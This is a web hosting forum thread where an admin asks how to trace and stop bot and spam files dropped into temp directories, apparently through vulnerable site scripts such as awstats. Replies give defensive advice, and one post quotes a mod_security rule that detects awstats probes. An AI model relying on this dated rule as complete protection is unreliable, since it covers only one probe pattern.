Results 1 to 13 of 13
  1. #1
    Join Date
    Dec 2003
    Posts
    377

    some nobody files "sleep in my /var/tmp, /tmp,/ dev/shm

    My server is cpanel + fedora core 2. I hosted around near 200 webistes on one sevrer. But mostly is inactive.

    I facing a problem recently. I check /var/tmp, /tmp,/ dev/shm everyday. I found that I usually see "nobody" files like bot, edddrop, spam files appear in /var/tmp, /tmp,/ dev/shm. I think is come from vulnerability scripts webiste.

    I unbale to login server any times to delet it. May I know any idea can trave the files where they from and fix the vulnerability scripts webiste. Do we have any method to protect it?

  2. #2
    Join Date
    Mar 2003
    Location
    Canada
    Posts
    8,909
    I'm a bit confused, are you able to login to the server as root?
    Patrick William | RACK911 Labs | Software Security Auditing
    400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com

    www.HostingSecList.com - Security notices for the hosting community.

  3. #3
    Join Date
    Dec 2003
    Posts
    377
    Yes. I able to login to root.

    I guess the nobody files is came from users webiste. example back door or vulnerability php scripts.

  4. #4
    Join Date
    Nov 2005
    Location
    BC, Canada
    Posts
    773
    Kill the processes if they're running, delete the files, patch Apache if needed, and check the logs to see which script was exploited to download the files. Look in Apache's access_log for "wget" and you'll probably find the command sent to an insecure script.
    || Higher Intellect || Half a million documents and climbing.
    || CupidClick Dating || Just for Canadians.

  5. #5
    Secure the tmp directory and get mod_security
    Eleven2 Web Hosting - World-Wide Hosting, Done Right!

  6. #6
    Join Date
    Nov 2003
    Location
    Amidst several dimensions
    Posts
    4,321
    apparenyly someone put an irc utility in your server through a vulnerability. check awstats. it was once notorious for such exploitation.

  7. #7
    Join Date
    Mar 2003
    Location
    Canada
    Posts
    8,909
    Quote Originally Posted by unity100
    apparenyly someone put an irc utility in your server through a vulnerability. check awstats. it was once notorious for such exploitation.
    Yeah, every day I always get scanned for that flaw. Laugh.
    Patrick William | RACK911 Labs | Software Security Auditing
    400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com

    www.HostingSecList.com - Security notices for the hosting community.

  8. #8
    Join Date
    Dec 2003
    Posts
    377
    everyday I stop the apache and use "lsof -u nobody" to find out the nobody files. I feel quite tired to do it and check row by row. Any good idea to manage to monitoring the security?

    Yes, mod_security installed. But i don't know does it work well or not.

  9. #9
    Join Date
    Dec 2003
    Posts
    377
    Quote Originally Posted by unity100
    apparenyly someone put an irc utility in your server through a vulnerability. check awstats. it was once notorious for such exploitation.

    May I know how to check the awstats in ssh?

  10. #10
    Quote Originally Posted by 0218
    Yes, mod_security installed. But i don't know does it work well or not.
    Do a search on google and get some good rules for it.
    Eleven2 Web Hosting - World-Wide Hosting, Done Right!

  11. #11
    Use this site to get some rules: http://gotroot.com/tiki-index.php?pa...security+rules

    I know there is some awstats ones on there. Like:

    #awstats probe
    SecFilterSelective THE_REQUEST "/awstats\.pl HTTP\/(0\.9|1\.0|1\.1)$"
    Eleven2 Web Hosting - World-Wide Hosting, Done Right!

  12. #12
    Join Date
    Dec 2003
    Posts
    377
    Thank you

  13. #13
    Join Date
    Nov 2003
    Location
    Amidst several dimensions
    Posts
    4,321
    You are on cpanel. Check your version of awstats through any site's awstats utility. If yours is outdated, its possible that your version might be one of the ones that still has the security hole that allows rootkits, irc bots or other malicious pieces in your var folder.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •